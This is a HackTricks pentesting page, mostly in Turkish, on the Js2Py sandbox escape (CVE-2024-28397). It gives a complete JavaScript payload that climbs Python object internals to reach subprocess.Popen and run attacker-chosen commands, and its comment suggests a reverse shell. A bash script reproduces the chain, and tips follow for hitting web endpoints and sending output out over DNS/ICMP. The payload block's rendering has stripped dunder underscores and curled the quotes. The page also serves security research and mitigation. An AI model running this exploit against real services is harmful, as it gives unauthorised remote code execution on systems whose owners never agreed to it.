HackTricks
Js2Py sandbox escape (CVE-2024-28397)
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Js2Py, JavaScript’i Python nesnelerine çevirir; bu nedenle js2py.disable_pyimport() kullanılsa bile, güvenilmeyen JS Python iç yapılarında dolaşıp subprocess.Popen gibi tehlikeli sınıflara ulaşabilir. 20.74 sürümleri, Js2Py’nin JS nesnelerine açtığı Python reflection ilkel fonksiyonlarını istismar ederek aksi takdirde “sandboxed” olan JavaScript’ten RCE elde etmeye imkân verir.
Primitive: pivot from JS object wrappers to Python objects
- Get a Python-backed object:
Object.getOwnPropertyNames({})returns adict_keysobject in Python space. - Recover attribute access: grab
.__getattribute__from that object and call it to read arbitrary attributes (e.g.,"__class__"). - Climb to
object: from<class 'dict_keys'>read.__base__to reach Python’s baseobject. - Enumerate loaded classes: call
object.__subclasses__()to walk every class already loaded in the interpreter. - Find
subprocess.Popen: recursively search subclasses where__module__ == "subprocess"and__name__ == "Popen". - Execute a command: instantiate Popen with attacker-controlled arguments and invoke
.communicate()to capture output.
Örnek payload — Js2Py'yi kötüye kullanarak subprocess.Popen'e ulaşma
```javascript // Replace cmd with desired payload (reverse shell / ping / etc.) let cmd = "id"; let hacked, bymarve, n11; let getattr, obj;hacked = Object.getOwnPropertyNames({}); // -> dict_keys([]) bymarve = hacked.getattribute; n11 = bymarve(“getattribute”); // attribute access primitive obj = n11(“class”).base; // pivot to <class ‘object’> getattr = obj.getattribute;
function findpopen(o) { let result; for (let i in o.subclasses()) { let item = o.subclasses()[i]; if (item.module == “subprocess” && item.name == “Popen”) { return item; } if (item.name != “type” && (result = findpopen(item))) { return result; } } }
// Popen(cmd, stdin/out/err pipes…) then .communicate() for output n11 = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate(); console.log(n11); n11; // returned to caller if framework sends eval_js result back
</details>
Neden işe yarıyor: Js2Py, Python nesne sarmalayıcılarını JS'ye `__getattribute__`, `__class__`, `__base__` veya `__subclasses__`'ı kaldırmadan açığa çıkarır. `disable_pyimport()` yalnızca açıkça yapılan `pyimport`'ları engeller, ancak yukarıdaki zincir hiçbir yeni şeyi import etmez; zaten yüklü modülleri ve sınıfları bellekte yeniden kullanır.
## Reproducing the chain locally
```bash
# Js2Py 0.74 breaks on Python 3.12/3.13; pin 3.11 for testing
uv run --with js2py==0.74 --python 3.11 python - <<'PY'
import js2py
print(js2py.eval_js("Object.getOwnPropertyNames({})")) # dict_keys([])
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__")) # method-wrapper
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\")"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__"))
print(js2py.eval_js("Object.getOwnPropertyNames({}).__getattribute__(\"__class__\").__base__.__subclasses__()"))
PY
Web sandbox’larına karşı operasyonlar
- Saldırgan kontrollü JS’i
js2py.eval_js’e veren herhangi bir endpoint (örneğin, bir Flask/run_codeAPI’si), süreç kullanıcısı shell access’e sahipse anında RCE olur. .communicate()bytes döndürdüğündejsonify({'result': result})geri döndürme başarısız olur; serileştirme engelleyicilerinden kaçınmak için decode edin veya çıktıyı DNS/ICMP’e yönlendirin.disable_pyimport()bu zinciri hafifletmez; sert izolasyon (ayrı process/container) veya Js2Py’nin güvensiz kod yürütmesini kaldırmak gereklidir.
Referanslar
- HTB: CodeTwo write-up (Js2Py CVE-2024-28397 escape)
- Marven11 CVE-2024-28397 Js2Py sandbox escape PoC
Tip
AWS Hacking’i öğrenin ve pratik yapın:
GCP Hacking’i öğrenin ve pratik yapın:HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.